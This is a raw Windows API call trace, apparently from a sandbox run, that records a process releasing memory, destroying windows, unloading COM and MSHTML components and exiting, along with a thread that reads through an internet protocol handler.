[0041.181] VirtualFree (lpAddress=0xc0ace24000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.181] VirtualFree (lpAddress=0xc0ace25000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.181] VirtualFree (lpAddress=0xc0ace26000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.181] VirtualFree (lpAddress=0xc0ace27000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.181] VirtualFree (lpAddress=0xc0ace28000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.181] VirtualFree (lpAddress=0xc0ace29000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.181] VirtualFree (lpAddress=0xc0ace2a000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.182] VirtualFree (lpAddress=0xc0ace2b000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.182] VirtualFree (lpAddress=0xc0ace2c000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.182] VirtualFree (lpAddress=0xc0ace2d000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.182] VirtualFree (lpAddress=0xc0ace2e000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.182] VirtualFree (lpAddress=0xc0ace2f000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.182] VirtualFree (lpAddress=0xc0ace30000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.183] VirtualFree (lpAddress=0xc0ace31000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.183] VirtualFree (lpAddress=0xc0ace32000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.183] VirtualFree (lpAddress=0xc0ace33000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.183] VirtualFree (lpAddress=0xc0ace34000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.183] VirtualFree (lpAddress=0xc0ace35000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.184] VirtualFree (lpAddress=0xc0ace36000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.184] VirtualFree (lpAddress=0xc0ace37000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.184] VirtualFree (lpAddress=0xc0ace38000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.184] VirtualFree (lpAddress=0xc0ace39000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.184] VirtualFree (lpAddress=0xc0ace3a000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.185] VirtualFree (lpAddress=0xc0ace3b000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.185] VirtualFree (lpAddress=0xc0ace3c000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.185] VirtualFree (lpAddress=0xc0ace3d000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.185] VirtualFree (lpAddress=0xc0ace3e000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.185] VirtualFree (lpAddress=0xc0ace3f000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.186] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc0aaa515e0 | out: lpSystemTimeAsFileTime=0xc0aaa515e0*(dwLowDateTime=0xe82fc775, dwHighDateTime=0x1d3a68a))
[0041.186] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc0aaa515e8 | out: lpSystemTimeAsFileTime=0xc0aaa515e8*(dwLowDateTime=0xe82fc775, dwHighDateTime=0x1d3a68a))
[0041.186] IUnknown:Release (This=0xb8a8ccde70) returned 0x0
[0041.186] IUnknown:Release (This=0xc0aab09280) returned 0x0
[0041.186] IUnknown:Release (This=0x7ffb238e5d88) returned 0x7fff
[0041.186] CoTaskMemFree (pv=0xb8a8c39c00)
[0041.186] CoTaskMemFree (pv=0xb8a8c39e00)
[0041.186] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc0aaa51598 | out: lpSystemTimeAsFileTime=0xc0aaa51598*(dwLowDateTime=0xe82fc775, dwHighDateTime=0x1d3a68a))
[0041.186] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc0aaa515a8 | out: lpSystemTimeAsFileTime=0xc0aaa515a8*(dwLowDateTime=0xe82fc775, dwHighDateTime=0x1d3a68a))
[0041.186] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc0aaa515d0 | out: lpSystemTimeAsFileTime=0xc0aaa515d0*(dwLowDateTime=0xe82fc775, dwHighDateTime=0x1d3a68a))
[0041.186] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc0aaa515d8 | out: lpSystemTimeAsFileTime=0xc0aaa515d8*(dwLowDateTime=0xe82fc775, dwHighDateTime=0x1d3a68a))
[0041.186] GetThreadContext (in: hThread=0xfffffffffffffffe, lpContext=0xb8a8a2f370 | out: lpContext=0xb8a8a2f370*(P1Home=0x0, P2Home=0x0, P3Home=0x0, P4Home=0x0, P5Home=0x0, P6Home=0x0, ContextFlags=0x100002, MxCsr=0x0, SegCs=0x0, SegDs=0x0, SegEs=0x0, SegFs=0x0, SegGs=0x0, SegSs=0x0, EFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, Rax=0x7ffb228f17b0, Rcx=0xc0aab08330, Rdx=0x0, Rbx=0xc0aaa4d5d0, Rsp=0x0, Rbp=0xc0aaafc100, Rsi=0xc0aaa4d5d0, Rdi=0xc0aaa4d5d0, R8=0xc0aaa49fb8, R9=0xc0ace3f000, R10=0x0, R11=0xb8a8a2fb00, R12=0x0, R13=0xb8a8c127f1, R14=0x0, R15=0x0, Rip=0x0, FltSave.ControlWord=0x0, FltSave.StatusWord=0x0, FltSave.TagWord=0x0, FltSave.Reserved1=0x0, FltSave.ErrorOpcode=0x0, FltSave.ErrorOffset=0x0, FltSave.ErrorSelector=0x0, FltSave.Reserved2=0x0, FltSave.DataOffset=0x0, FltSave.DataSelector=0x0, FltSave.Reserved3=0x0, FltSave.MxCsr=0x0, FltSave.MxCsr_Mask=0x0, FltSave.FloatRegisters.Low=0x0, FltSave.FloatRegisters.High=0x0, FltSave.XmmRegisters.Low=0x0, FltSave.XmmRegisters.High=0x0, FltSave.Reserved4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0), FltSave.StackControl=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0), FltSave.Cr0NpxState=0x0, Header.Low=0x0, Header.High=0x0, Legacy.Low=0x0, Legacy.High=0x0, Xmm0.Low=0x0, Xmm0.High=0x0, Xmm1.Low=0x0, Xmm1.High=0x0, Xmm2.Low=0x0, Xmm2.High=0x0, Xmm3.Low=0x0, Xmm3.High=0x0, Xmm4.Low=0x0, Xmm4.High=0x0, Xmm5.Low=0x0, Xmm5.High=0x0, Xmm6.Low=0x0, Xmm6.High=0x0, Xmm7.Low=0x0, Xmm7.High=0x0, Xmm8.Low=0x0, Xmm8.High=0x0, Xmm9.Low=0x0, Xmm9.High=0x0, Xmm10.Low=0x0, Xmm10.High=0x0, Xmm11.Low=0x0, Xmm11.High=0x0, Xmm12.Low=0x0, Xmm12.High=0x0, Xmm13.Low=0x0, Xmm13.High=0x0, Xmm14.Low=0x0, Xmm14.High=0x0, Xmm15.Low=0x0, Xmm15.High=0x0, VectorRegister.Low=0x0, VectorRegister.High=0x0, VectorControl=0x0, DebugControl=0x0, LastBranchToRip=0x0, LastBranchFromRip=0x0, LastExceptionToRip=0x0, LastExceptionFromRip=0x0)) returned 1
[0041.186] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc0aaa515e0 | out: lpSystemTimeAsFileTime=0xc0aaa515e0*(dwLowDateTime=0xe82fc775, dwHighDateTime=0x1d3a68a))
[0041.186] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc0aaa515e8 | out: lpSystemTimeAsFileTime=0xc0aaa515e8*(dwLowDateTime=0xe82fc775, dwHighDateTime=0x1d3a68a))
[0041.187] IUnknown:Release (This=0xb8a8c37cf0) returned 0x0
[0041.187] UnregisterPowerSettingNotification (Handle=0xb8a8c4b460) returned 1
[0041.187] SetWindowLongPtrW (hWnd=0x7016c, nIndex=-21, dwNewLong=0x0) returned 0xb8a8c2f4d0
[0041.187] DestroyWindow (hWnd=0x7016c) returned 1
[0041.187] GetWindowLongPtrW (hWnd=0x7016c, nIndex=-21) returned 0x0
[0041.187] NtdllDefWindowProc_W (hWnd=0x7016c, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0
[0041.187] GetWindowLongPtrW (hWnd=0x7016c, nIndex=-21) returned 0x0
[0041.187] NtdllDefWindowProc_W (hWnd=0x7016c, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0
[0041.187] GetWindowLongPtrW (hWnd=0x7016c, nIndex=-21) returned 0x0
[0041.187] NtdllDefWindowProc_W (hWnd=0x7016c, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0
[0041.188] UnregisterClassW (lpClassName=0xc16f, hInstance=0x0) returned 1
[0041.188] UnmapViewOfFile (lpBaseAddress=0xc0aacb0000) returned 1
[0041.188] CloseHandle (hObject=0x2e8) returned 1
[0041.188] CloseHandle (hObject=0x2e4) returned 1
[0041.188] GetModuleHandleW (lpModuleName="OLEAUT32") returned 0x7ffb3c9b0000
[0041.188] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0041.188] GetProcAddress (hModule=0x7ffb3c9b0000, lpProcName=0xc9) returned 0x7ffb3c9cb770
[0041.188] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f940 | out: lpflOldProtect=0xb8a8a2f940*=0x4) returned 1
[0041.188] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0041.188] IInternetSession:UnregisterNameSpace (This=0xb8a8c307c0, pCF=0x7ffb238c81b0, pszProtocol="res") returned 0x0
[0041.188] IUnknown:Release (This=0x7ffb238c81b0) returned 0x1
[0041.189] IInternetSession:UnregisterNameSpace (This=0xb8a8c307c0, pCF=0x7ffb238c81f0, pszProtocol="about") returned 0x0
[0041.189] IUnknown:Release (This=0x7ffb238c81f0) returned 0x1
[0041.189] IInternetSession:UnregisterNameSpace (This=0xb8a8c307c0, pCF=0x7ffb238c93c8, pszProtocol="blob") returned 0x0
[0041.189] IUnknown:AddRef (This=0x7ffb238c93c8) returned 0x1
[0041.189] IUnknown:Release (This=0xb8a8c307c0) returned 0x1
[0041.189] SetEvent (hEvent=0x1ac) returned 1
[0041.189] SetThreadPriority (hThread=0x1b0, nPriority=0) returned 1
[0041.190] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0xb8a8a2fa50*=0x1a0, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
[0041.190] CloseHandle (hObject=0x1a8) returned 1
[0041.190] CloseHandle (hObject=0x1a0) returned 1
[0041.190] CloseHandle (hObject=0x1ac) returned 1
[0041.190] CloseHandle (hObject=0x0) returned 0
[0041.190] CloseHandle (hObject=0x1a4) returned 1
[0041.190] CloseHandle (hObject=0x194) returned 1
[0041.190] CloseHandle (hObject=0x190) returned 1
[0041.190] CoTaskMemFree (pv=0x0)
[0041.190] IUnknown:Release (This=0xb8a8c38920) returned 0x0
[0041.190] SetEvent (hEvent=0x2e0) returned 1
[0041.190] GetCurrentThreadId () returned 0x210
[0041.190] WaitForSingleObject (hHandle=0x2dc, dwMilliseconds=0x1388) returned 0x0
[0041.191] GetExitCodeThread (in: hThread=0x2dc, lpExitCode=0xb8a8a2f920 | out: lpExitCode=0xb8a8a2f920) returned 1
[0041.191] CloseHandle (hObject=0x2e0) returned 1
[0041.191] CloseHandle (hObject=0x2dc) returned 1
[0041.191] DeleteDC (hdc=0xe01077b) returned 1
[0041.191] KillTimer (hWnd=0x50210, uIDEvent=0x2004) returned 1
[0041.191] KillTimer (hWnd=0x50210, uIDEvent=0x2005) returned 1
[0041.191] PeekMessageW (in: lpMsg=0xb8a8a2fa30, hWnd=0x50210, wMsgFilterMin=0x8003, wMsgFilterMax=0x8003, wRemoveMsg=0x1 | out: lpMsg=0xb8a8a2fa30) returned 0
[0041.191] DestroyWindow (hWnd=0x50210) returned 1
[0041.191] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0
[0041.191] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x46, wParam=0x0, lParam=0xb8a8a2f9c0) returned 0x0
[0041.192] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x47, wParam=0x0, lParam=0xb8a8a2f9c0) returned 0x0
[0041.192] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0
[0041.192] NtdllDefWindowProc_W (hWnd=0x50210, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0
[0041.203] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0041.204] GetProcAddress (hModule=0x7ffb3cb20000, lpProcName="CoDecrementMTAUsage") returned 0x7ffb3cd3b430
[0041.204] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f8a0 | out: lpflOldProtect=0xb8a8a2f8a0*=0x4) returned 1
[0041.204] CoDecrementMTAUsage (Cookie=0xb8a8c30490) returned 0x0
[0041.206] SetEvent (hEvent=0x15c) returned 1
[0041.206] GetCurrentThreadId () returned 0x210
[0041.206] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x1388) returned 0x0
[0041.661] GetExitCodeThread (in: hThread=0x288, lpExitCode=0xb8a8a2fa40 | out: lpExitCode=0xb8a8a2fa40) returned 1
[0041.661] CloseHandle (hObject=0x15c) returned 1
[0041.661] CloseHandle (hObject=0x158) returned 1
[0041.661] CloseHandle (hObject=0x288) returned 1
[0041.661] CActiveIMMAppEx_Trident:IUnknown:Release (This=0xb8a8c39740) returned 0x0
[0041.661] ReleaseActCtx (in: hActCtx=0xb8a8c35a98 | out: hActCtx=0xb8a8c35a98)
[0041.661] SetEvent (hEvent=0x2ec) returned 1
[0041.662] WaitForSingleObject (hHandle=0x2f0, dwMilliseconds=0xffffffff) returned 0x0
[0041.662] CloseHandle (hObject=0x2f0) returned 1
[0041.662] CloseHandle (hObject=0x300) returned 1
[0041.662] CloseHandle (hObject=0x2f8) returned 1
[0041.662] UnmapViewOfFile (lpBaseAddress=0xc0aacc0000) returned 1
[0041.662] CloseHandle (hObject=0x2ec) returned 1
[0041.662] FreeLibrary (hLibModule=0x7ffb223a0000) returned 1
[0041.662] FreeLibrary (hLibModule=0x7ffb223a0000) returned 1
[0041.662] UnregisterClassW (lpClassName=0xc126, hInstance=0x7ffb223a0000) returned 1
[0041.662] UnregisterClassW (lpClassName=0xc123, hInstance=0x7ffb223a0000) returned 1
[0041.662] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0041.663] GetProcAddress (hModule=0x7ffb3cb20000, lpProcName="OleUninitialize") returned 0x7ffb3cb2a4a0
[0041.664] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2faa0 | out: lpflOldProtect=0xb8a8a2faa0*=0x4) returned 1
[0041.664] OleUninitialize ()
[0041.664] DestroyWindow (hWnd=0x5016e) returned 1
[0041.664] NtdllDefWindowProc_W (hWnd=0x5016e, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0
[0041.664] PostQuitMessage (nExitCode=0)
[0041.665] DllCanUnloadNow () returned 0x0
[0041.665] NdrDllCanUnloadNow (pPSFactoryBuffer=0x7ffb22338fb8) returned 0x0
[0041.665] SetEvent (hEvent=0x524) returned 1
[0041.665] SetThreadPriority (hThread=0x514, nPriority=0) returned 1
[0041.665] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0xb8a8a2f640*=0x528, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
[0041.666] CloseHandle (hObject=0x4fc) returned 1
[0041.666] CloseHandle (hObject=0x528) returned 1
[0041.666] CloseHandle (hObject=0x524) returned 1
[0041.667] VirtualFree (lpAddress=0xc0ace22000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.668] VirtualFree (lpAddress=0xc0ace90000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0041.669] VirtualFree (lpAddress=0xc0ace20000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0041.670] WaitForMultipleObjectsEx (nCount=0x1, lpHandles=0xb8a8a2f708*=0x514, bWaitAll=1, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
[0041.671] CloseHandle (hObject=0x514) returned 1
[0041.671] DllCanUnloadNow () returned 0x0
[0041.671] DllCanUnloadNow () returned 0x0
[0041.671] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0041.671] FreeLibrary (hLibModule=0x7ffb3c2d0000) returned 1
[0041.671] DllCanUnloadNow () returned 0x1
[0041.671] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1
[0041.743] DeleteAtom (nAtom=0xc005) returned 0x0
[0041.753] EtwEventUnregister (RegHandle=0x7500b8a8ce4bd0) returned 0x0
[0041.753] EtwEventUnregister (RegHandle=0x7600b8a8ce6110) returned 0x0
[0041.753] EtwEventUnregister (RegHandle=0x7700b8a8ce5450) returned 0x0
[0041.753] FreeLibrary (hLibModule=0x7ffb3d310000) returned 1
[0041.776] NtdllDefWindowProc_W (hWnd=0x5016e, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0
[0041.777] FreeLibrary (hLibModule=0x7ffb223a0000) returned 1
[0041.777] GetCurrentThreadId () returned 0x210
[0041.777] EtwEventUnregister (RegHandle=0x1800b8a8c208c0) returned 0x0
[0041.777] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0041.777] GetProcAddress (hModule=0x7ffb2ea50000, lpProcName=0x1e8) returned 0x7ffb2eaae150
[0041.777] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f670 | out: lpflOldProtect=0xb8a8a2f670*=0x4) returned 1
[0041.777] EtwEventUnregister (RegHandle=0x2700b8a8c23d10) returned 0x0
[0041.777] EtwEventUnregister (RegHandle=0x2500b8a8c22d30) returned 0x0
[0041.777] EtwEventUnregister (RegHandle=0x2400b8a8c22c20) returned 0x0
[0041.777] EtwEventUnregister (RegHandle=0x1500b8a8c1e480) returned 0x0
[0041.777] EtwEventUnregister (RegHandle=0x2600b8a8c22e40) returned 0x0
[0041.777] FindAtomW (lpString="{4653C0A4-2B2D-48DE-AB80-93910A28F900}") returned 0xc000
[0041.778] DeleteAtom (nAtom=0xc000) returned 0x0
[0041.778] HeapDestroy (hHeap=0xc0aabe0000) returned 1
[0041.778] FreeLibrary (hLibModule=0x7ffb3d310000) returned 1
[0041.778] LocalFree (hMem=0x0) returned 0x0
[0041.778] FreeLibrary (hLibModule=0x7ffb2ea50000) returned 1
[0041.778] FreeLibrary (hLibModule=0x7ffb2cef0000) returned 1
[0041.778] VirtualFree (lpAddress=0xb8a8b60000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0041.781] VirtualFree (lpAddress=0xc0ad0c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0041.782] VirtualFree (lpAddress=0xc0aaad0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0041.783] EtwEventUnregister (RegHandle=0x1600b8a8c1e590) returned 0x0
[0041.783] EtwEventUnregister (RegHandle=0x1700b8a8c1e6a0) returned 0x0
[0041.783] VirtualFree (lpAddress=0xb8aa9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0041.811] exit (_Code=0)
Thread:
id = 2
os_tid = 0xca4
Thread:
id = 3
os_tid = 0xc9c
Thread:
id = 4
os_tid = 0xcb8
[0036.420] GetCurrentThreadId () returned 0xcb8
[0036.420] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x7ffb22492ea0, phModule=0xb8a8fefa70 | out: phModule=0xb8a8fefa70*=0x7ffb223a0000) returned 1
[0036.420] EtwEventActivityIdControl (in: ControlCode=0x5, ActivityId=0xb8a8fefa98*(Data1=0x3d33a996, Data2=0x7ffb, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0xff, [3]=0xa8, [4]=0xb8, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xb8a8fefa98*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0
[0036.421] SetEvent (hEvent=0x1a0) returned 1
[0036.424] GetCurrentThread () returned 0xfffffffffffffffe
[0036.426] SetThreadPriority (hThread=0xfffffffffffffffe, nPriority=-1) returned 1
[0041.189] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0xb8a8fefa88*=0x1ac, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
[0041.189] SetEvent (hEvent=0x1a0) returned 1
[0041.189] FreeLibraryAndExitThread (hLibModule=0x7ffb223a0000, dwExitCode=0x0)
[0041.189] GetCurrentThreadId () returned 0xcb8
Thread:
id = 5
os_tid = 0xcc0
[0037.585] GetCurrentThreadId () returned 0xcc0
[0037.586] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x7ffb22474320, phModule=0xc0aadff988 | out: phModule=0xc0aadff988*=0x7ffb223a0000) returned 1
[0037.586] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0037.587] GetProcAddress (hModule=0x7ffb3cc70000, lpProcName="CoInitializeEx") returned 0x7ffb3cce3170
[0037.587] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xc0aadff7b0 | out: lpflOldProtect=0xc0aadff7b0*=0x4) returned 1
[0037.587] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0037.587] GetTickCount () returned 0x1be3a
[0037.587] GetCurrentThreadId () returned 0xcc0
[0037.588] memcpy_s (in: _Destination=0xb8a8c4f010, _DestinationSize=0x1000, _Source=0xb8a8c4b00c, _SourceSize=0x2bf | out: _Destination=0xb8a8c4f010) returned 0x0
[0037.588] IUnknown:QueryInterface (in: This=0xb8a8c49970, riid=0x7ffb233e9d40*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xc0aadff6c0 | out: ppvObject=0xc0aadff6c0*=0xb8a8c49970) returned 0x0
[0037.588] IInternetProtocol:Read (in: This=0xb8a8c49970, pv=0xb8a8c4f2cf, cb=0xd41, pcbRead=0xc0aadff850 | out: pv=0xb8a8c4f2cf, pcbRead=0xc0aadff850*=0x0) returned 0x1
[0037.588] IUnknown:Release (This=0xb8a8c49970) returned 0x2
[0037.589] IUnknown:QueryInterface (in: This=0xb8a8c49970, riid=0x7ffb233e9d40*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xc0aadff6b0 | out: ppvObject=0xc0aadff6b0*=0xb8a8c49970) returned 0x0
[0037.589] IInternetProtocolRoot:Terminate (This=0xb8a8c49970, dwOptions=0x0) returned 0x0
[0037.589] IUnknown:Release (This=0xb8a8c47918) returned 0x6
[0037.589] IUnknown:Release (This=0xb8a8c47998) returned 0x5
[0037.589] IUnknown:Release (This=0xb8a8c49970) returned 0x2
[0037.589] IUnknown:AddRef (This=0xb8a8c49970) returned 0x3
[0037.589] IUnknown:Release (This=0xb8a8c49970) returned 0x2
[0037.589] IUnknown:Release (This=0xb8a8c49970) returned 0x1
[0037.589] CoTaskMemFree (pv=0xb8a8c48fa0)
[0037.590] GetCurrentThreadId () returned 0xcc0
[0037.590] GetCurrentThreadId () returned 0xcc0
[0037.590] GetCurrentThreadId () returned 0xcc0
[0037.665] memcpy_s (in: _Destination=0xc0aab84000, _DestinationSize=0x300, _Source=0xb8a8c4f010, _SourceSize=0x2bf | out: _Destination=0xc0aab84000) returned 0x0
[0037.665] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xb8a8c4f010, cbMultiByte=703, lpWideCharStr=0xb8a8c50108, cchWideChar=703 | out: lpWideCharStr="\n\n\n\n") returned 703
[0037.673] memcpy_s (in: _Destination=0xb8a8c5d370, _DestinationSize=0x200, _Source=0xb8a8c26cf0, _SourceSize=0x38 | out: _Destination=0xb8a8c5d370) returned 0x0
[0037.674] GetCurrentThreadId () returned 0xcc0
[0037.674] IUnknown:AddRef (This=0xb8a8c30650) returned 0xe
[0037.674] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xc0aadff580 | out: lpCPInfo=0xc0aadff580) returned 1
[0037.674] IUnknown:AddRef (This=0xb8a8c307c0) returned 0x5
[0037.674] IUnknown:AddRef (This=0xb8a8c30650) returned 0xf
[0037.674] IUnknown:QueryInterface (in: This=0xb8a8c30650, riid=0x7ffb234680e0*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0xc0aadff560 | out: ppvObject=0xc0aadff560*=0xb8a8c30650) returned 0x0
[0037.674] IUnknown:Release (This=0xb8a8c30650) returned 0xf
[0037.674] IUnknown:AddRef (This=0xb8a8c30650) returned 0x10
[0037.674] IUri:GetScheme (in: This=0xb8a8c30650, pdwScheme=0xc0aadff670 | out: pdwScheme=0xc0aadff670*=0x9) returned 0x0
